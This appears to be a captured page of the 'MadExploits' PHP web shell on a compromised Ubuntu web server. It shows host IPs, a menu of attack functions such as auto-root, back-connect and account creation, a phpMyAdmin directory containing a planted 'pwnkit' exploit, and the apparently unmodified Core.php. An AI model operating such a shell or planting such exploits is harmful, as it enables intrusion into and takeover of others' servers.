Linux ip-172-31-33-47 5.4.0-1045-aws #47~18.04.1-Ubuntu SMP Tue Apr 13 15:58:14 UTC 2021 x86_64
Apache/2.4.29 (Ubuntu)
: 172.31.33.47 | : 18.221.193.43
Cant Read [ /etc/named.conf ]
7.4.20
www-data
www.github.com/MadExploits
Terminal
AUTO ROOT
Adminer
Backdoor Destroyer
Linux Exploit
Lock Shell
Lock File
Create User
CREATE RDP
PHP Mailer
BACKCONNECT
UNLOCK SHELL
HASH IDENTIFIER
CPANEL RESET
CREATE WP USER
README
+ Create Folder
+ Create File
/
var /
www /
html /
restaurants /
var /
phpmyadmin /
src /
[ HOME SHELL ]
Name
Size
Permission
Action
Advisory
[ DIR ]
drwxr-xr-x
Bookmarks
[ DIR ]
drwxr-xr-x
Charsets
[ DIR ]
drwxr-xr-x
Command
[ DIR ]
drwxr-xr-x
Config
[ DIR ]
drwxr-xr-x
ConfigStorage
[ DIR ]
drwxr-xr-x
Container
[ DIR ]
drwxr-xr-x
Controllers
[ DIR ]
drwxr-xr-x
Crypto
[ DIR ]
drwxr-xr-x
Database
[ DIR ]
drwxr-xr-x
Dbal
[ DIR ]
drwxr-xr-x
Display
[ DIR ]
drwxr-xr-x
Engines
[ DIR ]
drwxr-xr-x
Error
[ DIR ]
drwxr-xr-x
Exceptions
[ DIR ]
drwxr-xr-x
Export
[ DIR ]
drwxr-xr-x
Favorites
[ DIR ]
drwxr-xr-x
Gis
[ DIR ]
drwxr-xr-x
Html
[ DIR ]
drwxr-xr-x
Http
[ DIR ]
drwxr-xr-x
Identifiers
[ DIR ]
drwxr-xr-x
Image
[ DIR ]
drwxr-xr-x
Import
[ DIR ]
drwxr-xr-x
Navigation
[ DIR ]
drwxr-xr-x
Partitioning
[ DIR ]
drwxr-xr-x
Plugins
[ DIR ]
drwxr-xr-x
Properties
[ DIR ]
drwxr-xr-x
Providers
[ DIR ]
drwxr-xr-x
Query
[ DIR ]
drwxr-xr-x
Replication
[ DIR ]
drwxr-xr-x
Routing
[ DIR ]
drwxr-xr-x
Server
[ DIR ]
drwxr-xr-x
Setup
[ DIR ]
drwxr-xr-x
Table
[ DIR ]
drwxr-xr-x
Theme
[ DIR ]
drwxr-xr-x
Tracking
[ DIR ]
drwxr-xr-x
Triggers
[ DIR ]
drwxr-xr-x
Twig
[ DIR ]
drwxr-xr-x
Utils
[ DIR ]
drwxr-xr-x
WebAuthn
[ DIR ]
drwxr-xr-x
.mad-root
0
B
-rw-r--r--
Application.php
6.31
KB
-rw-r--r--
BrowseForeigners.php
10.24
KB
-rw-r--r--
Cache.php
1.44
KB
-rw-r--r--
Charsets.php
7.08
KB
-rw-r--r--
Column.php
363
B
-rw-r--r--
ColumnFull.php
500
B
-rw-r--r--
Config.php
38.1
KB
-rw-r--r--
Console.php
3.14
KB
-rw-r--r--
Core.php
22.22
KB
-rw-r--r--
CreateAddField.php
14.6
KB
-rw-r--r--
Current.php
228
B
-rw-r--r--
DatabaseInterface.php
66.01
KB
-rw-r--r--
DbTableExists.php
1.4
KB
-rw-r--r--
EditField.php
495
B
-rw-r--r--
Encoding.php
7.97
KB
-rw-r--r--
FieldMetadata.php
10.64
KB
-rw-r--r--
File.php
19.72
KB
-rw-r--r--
FileListing.php
3.04
KB
-rw-r--r--
FlashMessages.php
1.23
KB
-rw-r--r--
Font.php
4.26
KB
-rw-r--r--
Footer.php
6.82
KB
-rw-r--r--
Git.php
18.5
KB
-rw-r--r--
Header.php
19.81
KB
-rw-r--r--
Index.php
14.45
KB
-rw-r--r--
IndexColumn.php
4.7
KB
-rw-r--r--
InsertEdit.php
73.25
KB
-rw-r--r--
InsertEditColumn.php
1.96
KB
-rw-r--r--
InternalRelations.php
17
KB
-rw-r--r--
IpAllowDeny.php
9
KB
-rw-r--r--
Language.php
4.12
KB
-rw-r--r--
LanguageManager.php
22.27
KB
-rw-r--r--
Linter.php
4.89
KB
-rw-r--r--
ListDatabase.php
4.93
KB
-rw-r--r--
Logging.php
2.79
KB
-rw-r--r--
Menu.php
19.9
KB
-rw-r--r--
Message.php
14.58
KB
-rw-r--r--
Mime.php
893
B
-rw-r--r--
Normalization.php
39.54
KB
-rw-r--r--
OpenDocument.php
8.78
KB
-rw-r--r--
Operations.php
34.63
KB
-rw-r--r--
ParseAnalyze.php
2.23
KB
-rw-r--r--
Pdf.php
3.89
KB
-rw-r--r--
Plugins.php
22.28
KB
-rw-r--r--
Profiling.php
2.17
KB
-rw-r--r--
Release.php
298
B
-rw-r--r--
ResponseRenderer.php
13.03
KB
-rw-r--r--
Sanitize.php
8.62
KB
-rw-r--r--
Scripts.php
3.7
KB
-rw-r--r--
Session.php
7.88
KB
-rw-r--r--
ShowGrants.php
2.06
KB
-rw-r--r--
Sql.php
60.06
KB
-rw-r--r--
SqlQueryForm.php
6.93
KB
-rw-r--r--
StorageEngine.php
15.08
KB
-rw-r--r--
SystemColumn.php
267
B
-rw-r--r--
SystemDatabase.php
4.62
KB
-rw-r--r--
Template.php
3.98
KB
-rw-r--r--
Transformations.php
17.2
KB
-rw-r--r--
TwoFactor.php
7.61
KB
-rw-r--r--
Types.php
23.88
KB
-rw-r--r--
UniqueCondition.php
8.26
KB
-rw-r--r--
Url.php
10.54
KB
-rw-r--r--
UrlRedirector.php
1.43
KB
-rw-r--r--
UserPassword.php
8.25
KB
-rw-r--r--
UserPreferences.php
10.22
KB
-rw-r--r--
UserPrivileges.php
520
B
-rw-r--r--
UserPrivilegesFactory.php
8.61
KB
-rw-r--r--
Util.php
68.74
KB
-rw-r--r--
Version.php
554
B
-rw-r--r--
VersionInformation.php
7.18
KB
-rw-r--r--
ZipExtension.php
10.01
KB
-rw-r--r--
pwnkit
10.99
KB
-rwxr-xr-x
Delete
Unzip
Zip
${this.title}
Close
Code Editor : Core.php
<?php declare(strict_types=1); namespace PhpMyAdmin; use PhpMyAdmin\Error\ErrorHandler; use PhpMyAdmin\Exceptions\MissingExtensionException; use PhpMyAdmin\Http\ServerRequest; use function __; use function array_pop; use function array_walk_recursive; use function chr; use function count; use function explode; use function filter_var; use function function_exists; use function getenv; use function gmdate; use function hash_equals; use function hash_hmac; use function header; use function header_remove; use function htmlspecialchars; use function http_build_query; use function in_array; use function is_array; use function is_scalar; use function is_string; use function json_decode; use function mb_strpos; use function mb_substr; use function parse_str; use function parse_url; use function preg_match; use function preg_replace; use function sprintf; use function str_replace; use function stripos; use function strlen; use function strpos; use function substr; use function unserialize; use function urldecode; use const DATE_RFC1123; use const E_USER_WARNING; use const FILTER_VALIDATE_IP; /** * Core functions used all over the scripts. */ class Core { /** * Removes insecure parts in a path; used before include() or * require() when a part of the path comes from an insecure source * like a cookie or form. * * @param string $path The path to check */ public static function securePath(string $path): string { // change .. to . return (string) preg_replace('@\.\.*@', '.', $path); } /** * Returns a link to the PHP documentation * * @param string $target anchor in documentation * * @return string the URL */ public static function getPHPDocLink(string $target): string { /* List of PHP documentation translations */ $phpDocLanguages = ['pt_BR', 'zh_CN', 'fr', 'de', 'ja', 'ru', 'es', 'tr']; $lang = 'en'; if (isset($GLOBALS['lang']) && in_array($GLOBALS['lang'], $phpDocLanguages, true)) { $lang = $GLOBALS['lang'] === 'zh_CN' ? 'zh' : $GLOBALS['lang']; } return self::linkURL('https://www.php.net/manual/' . $lang . '/' . $target); } /** * Warn or fail on missing extension. * * @param string $extension Extension name * @param bool $fatal Whether the error is fatal. * @param string $extra Extra string to append to message. */ public static function warnMissingExtension( string $extension, bool $fatal = false, string $extra = '', ): void { $message = 'The %s extension is missing. Please check your PHP configuration.'; /* Gettext does not have to be loaded yet here */ if (function_exists('__')) { $message = __('The %s extension is missing. Please check your PHP configuration.'); } $doclink = self::getPHPDocLink('book.' . $extension . '.php'); $message = sprintf($message, '[a@' . $doclink . '@Documentation][em]' . $extension . '[/em][/a]'); if ($extra !== '') { $message .= ' ' . $extra; } if ($fatal) { throw new MissingExtensionException(Sanitize::convertBBCode($message)); } ErrorHandler::getInstance()->addError($message, E_USER_WARNING, '', 0, false); } /** * Converts numbers like 10M into bytes * Used with permission from Moodle (https://moodle.org) by Martin Dougiamas * (renamed with PMA prefix to avoid double definition when embedded * in Moodle) * * @param string|int $size size (Default = 0) */ public static function getRealSize(string|int $size = 0): int { if (! $size) { return 0; } $binaryprefixes = [ 'T' => 1099511627776, 't' => 1099511627776, 'G' => 1073741824, 'g' => 1073741824, 'M' => 1048576, 'm' => 1048576, 'K' => 1024, 'k' => 1024, ]; if (preg_match('/^([0-9]+)([KMGT])/i', (string) $size, $matches)) { return (int) ($matches[1] * $binaryprefixes[$matches[2]]); } return (int) $size; } /** * Checks if the given $page is index.php and returns true if valid. * It ignores query parameters in $page (script.php?ignored) */ public static function checkPageValidity(string $page): bool { if ($page === '') { return false; } if ($page === 'index.php') { return true; } $newPage = mb_substr( $page, 0, (int) mb_strpos($page . '?', '?'), ); if ($newPage === 'index.php') { return true; } $newPage = urldecode($page); $newPage = mb_substr( $newPage, 0, (int) mb_strpos($newPage . '?', '?'), ); return $newPage === 'index.php'; } /** * Tries to find the value for the given environment variable name * * Searches in $_SERVER, $_ENV then tries getenv() and apache_getenv() in this order. * * @psalm-param non-empty-string $variableName */ public static function getEnv(string $variableName): string { $value = $_SERVER[$variableName] ?? $_ENV[$variableName] ?? getenv($variableName); if (is_scalar($value) && (string) $value !== '') { return (string) $value; } if (function_exists('apache_getenv')) { return (string) apache_getenv($variableName, true); // @codeCoverageIgnore } return ''; } /** * Returns application/json headers. This includes no caching. * * @return array<string, string> */ public static function headerJSON(): array { // No caching $headers = self::getNoCacheHeaders(); // Media type $headers['Content-Type'] = 'application/json; charset=UTF-8'; /** * Disable content sniffing in browser. * This is needed in case we include HTML in JSON, browser might assume it's html to display. */ $headers['X-Content-Type-Options'] = 'nosniff'; return $headers; } /** @return array<string, string> */ public static function getNoCacheHeaders(): array { $headers = []; $date = gmdate(DATE_RFC1123); // rfc2616 - Section 14.21 $headers['Expires'] = $date; // HTTP/1.1 $headers['Cache-Control'] = 'no-store, no-cache, must-revalidate, pre-check=0, post-check=0, max-age=0'; // HTTP/1.0 $headers['Pragma'] = 'no-cache'; // test case: exporting a database into a .gz file with Safari // would produce files not having the current time // (added this header for Safari but should not harm other browsers) $headers['Last-Modified'] = $date; return $headers; } /** * Sends header indicating file download. * * @param string $filename Filename to include in headers if empty, * none Content-Disposition header will be sent. * @param string $mimetype MIME type to include in headers. * @param int $length Length of content (optional) * @param bool $noCache Whether to include no-caching headers. */ public static function downloadHeader( string $filename, string $mimetype, int $length = 0, bool $noCache = true, ): void { $headers = []; if ($noCache) { $headers = self::getNoCacheHeaders(); } /* Replace all possibly dangerous chars in filename */ $filename = Sanitize::sanitizeFilename($filename); if ($filename !== '') { $headers['Content-Description'] = 'File Transfer'; $headers['Content-Disposition'] = 'attachment; filename="' . $filename . '"'; } $headers['Content-Type'] = $mimetype; // The default output in PMA uses gzip, // so if we want to output uncompressed file, we should reset the encoding. // See PHP bug https://github.com/php/php-src/issues/8218 header_remove('Content-Encoding'); $headers['Content-Transfer-Encoding'] = 'binary'; if ($length > 0) { $headers['Content-Length'] = (string) $length; } foreach ($headers as $name => $value) { header(sprintf('%s: %s', $name, $value)); } } /** * Returns value of an element in $array given by $path. * $path is a string describing position of an element in an associative array, * eg. Servers/1/host refers to $array[Servers][1][host] * * @param string $path path in the array * @param mixed[] $array the array * @param mixed $default default value * * @return mixed[]|mixed|null array element or $default */ public static function arrayRead(string $path, array $array, mixed $default = null): mixed { $keys = explode('/', $path); $value =& $array; foreach ($keys as $key) { if (! isset($value[$key])) { return $default; } $value =& $value[$key]; } return $value; } /** * Stores value in an array * * @param string $path path in the array * @param mixed[] $array the array * @param mixed $value value to store */ public static function arrayWrite(string $path, array &$array, mixed $value): void { $keys = explode('/', $path); $lastKey = array_pop($keys); $a =& $array; foreach ($keys as $key) { if (! isset($a[$key])) { $a[$key] = []; } $a =& $a[$key]; } $a[$lastKey] = $value; } /** * Removes value from an array * * @param string $path path in the array * @param mixed[] $array the array */ public static function arrayRemove(string $path, array &$array): void { $keys = explode('/', $path); $keysLast = array_pop($keys); $path = []; $depth = 0; $path[0] =& $array; $found = true; // go as deep as required or possible foreach ($keys as $key) { if (! isset($path[$depth][$key])) { $found = false; break; } $depth++; $path[$depth] =& $path[$depth - 1][$key]; } // if element found, remove it if ($found) { unset($path[$depth][$keysLast]); $depth--; } // remove empty nested arrays /** @infection-ignore-all */ for (; $depth >= 0; $depth--) { if (isset($path[$depth + 1]) && count($path[$depth + 1]) !== 0) { break; } unset($path[$depth][$keys[$depth]]); } } /** * Returns link to (possibly) external site using defined redirector. * * @param string $url URL where to go. * * @return string URL for a link. */ public static function linkURL(string $url): string { if (! preg_match('#^https?://#', $url)) { return $url; } $params = []; $params['url'] = $url; $url = Url::getCommon($params); //strip off token and such sensitive information. Just keep url. $arr = parse_url($url); if (! is_array($arr)) { $arr = []; } parse_str($arr['query'] ?? '', $vars); $query = http_build_query(['url' => $vars['url']]); if (Config::getInstance()->get('is_setup')) { return '../index.php?route=/url&' . $query; } return 'index.php?route=/url&' . $query; } /** * Checks whether domain of URL is an allowed domain or not. * Use only for URLs of external sites. * * @param string $url URL of external site. */ public static function isAllowedDomain(string $url): bool { $parsedUrl = parse_url($url); if ( ! is_array($parsedUrl) || ! isset($parsedUrl['host']) || isset($parsedUrl['user']) || isset($parsedUrl['pass']) || isset($parsedUrl['port']) ) { return false; } $domainAllowList = [ /* Include current domain */ $_SERVER['SERVER_NAME'], /* phpMyAdmin domains */ 'wiki.phpmyadmin.net', 'www.phpmyadmin.net', 'phpmyadmin.net', 'demo.phpmyadmin.net', 'docs.phpmyadmin.net', /* mysql.com domains */ 'dev.mysql.com', 'bugs.mysql.com', /* mariadb domains */ 'mariadb.org', 'mariadb.com', /* php.net domains */ 'php.net', 'www.php.net', /* Github domains*/ 'github.com', 'www.github.com', /* Percona domains */ 'www.percona.com', /* CVE domain */ 'www.cve.org', /* Following are doubtful ones. */ 'mysqldatabaseadministration.blogspot.com', ]; return in_array($parsedUrl['host'], $domainAllowList, true); } /** * Replace some html-unfriendly stuff * * @param string $buffer String to process * * @return string Escaped and cleaned up text suitable for html */ public static function mimeDefaultFunction(string $buffer): string { $buffer = htmlspecialchars($buffer); $buffer = str_replace(' ', ' ', $buffer); return (string) preg_replace("@((\015\012)|(\015)|(\012))@", '<br>' . "\n", $buffer); } /** * Displays SQL query before executing. * * @param mixed[]|string $queryData Array containing queries or query itself */ public static function previewSQL(array|string $queryData): void { $retval = '<div class="preview_sql">'; if ($queryData === '' || $queryData === []) { $retval .= __('No change'); } elseif (is_array($queryData)) { foreach ($queryData as $query) { $retval .= Html\Generator::formatSql($query); } } else { $retval .= Html\Generator::formatSql($queryData); } $retval .= '</div>'; $response = ResponseRenderer::getInstance(); $response->addJSON('sql_data', $retval); } /** * recursively check if variable is empty * * @param mixed $value the variable */ public static function emptyRecursive(mixed $value): bool { if (is_array($value)) { $empty = true; array_walk_recursive( $value, /** @param mixed $item */ static function ($item) use (&$empty): void { $empty = $empty && empty($item); }, ); return $empty; } return empty($value); } /** * Gets the "true" IP address of the current user * * @return string|bool the ip of the user */ public static function getIp(): string|bool { /* Get the address of user */ if (empty($_SERVER['REMOTE_ADDR'])) { /* We do not know remote IP */ return false; } $directIp = $_SERVER['REMOTE_ADDR']; /* Do we trust this IP as a proxy? If yes we will use it's header. */ $config = Config::getInstance(); if (! isset($config->settings['TrustedProxies'][$directIp])) { /* Return true IP */ return $directIp; } /** * Parse header in form: * X-Forwarded-For: client, proxy1, proxy2 */ // Get header content $value = self::getEnv($config->settings['TrustedProxies'][$directIp]); // Grab first element what is client adddress $value = explode(',', $value)[0]; // checks that the header contains only one IP address, $isIp = filter_var($value, FILTER_VALIDATE_IP); if ($isIp !== false) { // True IP behind a proxy return $value; } // We could not parse header return false; } /** * Sanitizes MySQL hostname * * * strips p: prefix(es) * * @param string $name User given hostname */ public static function sanitizeMySQLHost(string $name): string { while (stripos($name, 'p:') === 0) { /** @infection-ignore-all */ $name = substr($name, 2); } return $name; } /** * Sanitizes MySQL username * * * strips part behind null byte * * @param string $name User given username */ public static function sanitizeMySQLUser(string $name): string { $position = strpos($name, chr(0)); if ($position !== false) { return substr($name, 0, $position); } return $name; } /** * Safe unserializer wrapper * * It does not unserialize data containing objects * * @param string $data Data to unserialize */ public static function safeUnserialize(string $data): mixed { /* validate serialized data */ $length = strlen($data); $depth = 0; for ($i = 0; $i < $length; $i++) { $value = $data[$i]; switch ($value) { case '}': /* end of array */ if ($depth <= 0) { return null; } $depth--; break; case 's': /* string */ // parse sting length $strlen = (int) substr($data, $i + 2); // string start $i = strpos($data, ':', $i + 2); if ($i === false) { return null; } // skip string, quotes and ; $i += 2 + $strlen + 1; if ($data[$i] !== ';') { return null; } break; case 'b': case 'i': case 'd': /* bool, integer or double */ // skip value to separator $i = strpos($data, ';', $i); if ($i === false) { return null; } break; case 'a': /* array */ // find array start $i = strpos($data, '{', $i); if ($i === false) { return null; } // remember nesting $depth++; break; case 'N': /* null */ // skip to end $i = strpos($data, ';', $i); if ($i === false) { return null; } break; default: /* any other elements are not wanted */ return null; } } // check unterminated arrays if ($depth > 0) { return null; } return unserialize($data); } /** * Sign the sql query using hmac using the session token * * @param string $sqlQuery The sql query */ public static function signSqlQuery(string $sqlQuery): string { $secret = $_SESSION[' HMAC_secret '] ?? ''; return hash_hmac('sha256', $sqlQuery, $secret . Config::getInstance()->settings['blowfish_secret']); } /** * Check that the sql query has a valid hmac signature * * @param string $sqlQuery The sql query * @param string $signature The Signature to check */ public static function checkSqlQuerySignature(string $sqlQuery, string $signature): bool { $secret = $_SESSION[' HMAC_secret '] ?? ''; $hmac = hash_hmac('sha256', $sqlQuery, $secret . Config::getInstance()->settings['blowfish_secret']); return hash_equals($hmac, $signature); } public static function populateRequestWithEncryptedQueryParams(ServerRequest $request): ServerRequest { $queryParams = $request->getQueryParams(); $parsedBody = $request->getParsedBody(); unset($_GET['eq'], $_POST['eq'], $_REQUEST['eq']); if (! isset($queryParams['eq']) && (! is_array($parsedBody) || ! isset($parsedBody['eq']))) { return $request; } $encryptedQuery = ''; if ( is_array($parsedBody) && isset($parsedBody['eq']) && is_string($parsedBody['eq']) && $parsedBody['eq'] !== '' ) { $encryptedQuery = $parsedBody['eq']; unset($parsedBody['eq'], $queryParams['eq']); } elseif (isset($queryParams['eq']) && is_string($queryParams['eq']) && $queryParams['eq'] !== '') { $encryptedQuery = $queryParams['eq']; unset($queryParams['eq']); } $decryptedQuery = null; if ($encryptedQuery !== '') { $decryptedQuery = Url::decryptQuery($encryptedQuery); } if ($decryptedQuery === null) { $request = $request->withQueryParams($queryParams); if (is_array($parsedBody)) { return $request->withParsedBody($parsedBody); } return $request; } $urlQueryParams = (array) json_decode($decryptedQuery); foreach ($urlQueryParams as $urlQueryParamKey => $urlQueryParamValue) { if (is_array($parsedBody)) { $parsedBody[$urlQueryParamKey] = $urlQueryParamValue; $_POST[$urlQueryParamKey] = $urlQueryParamValue; } else { $queryParams[$urlQueryParamKey] = $urlQueryParamValue; $_GET[$urlQueryParamKey] = $urlQueryParamValue; } $_REQUEST[$urlQueryParamKey] = $urlQueryParamValue; } $request = $request->withQueryParams($queryParams); if (is_array($parsedBody)) { return $request->withParsedBody($parsedBody); } return $request; } }
Close
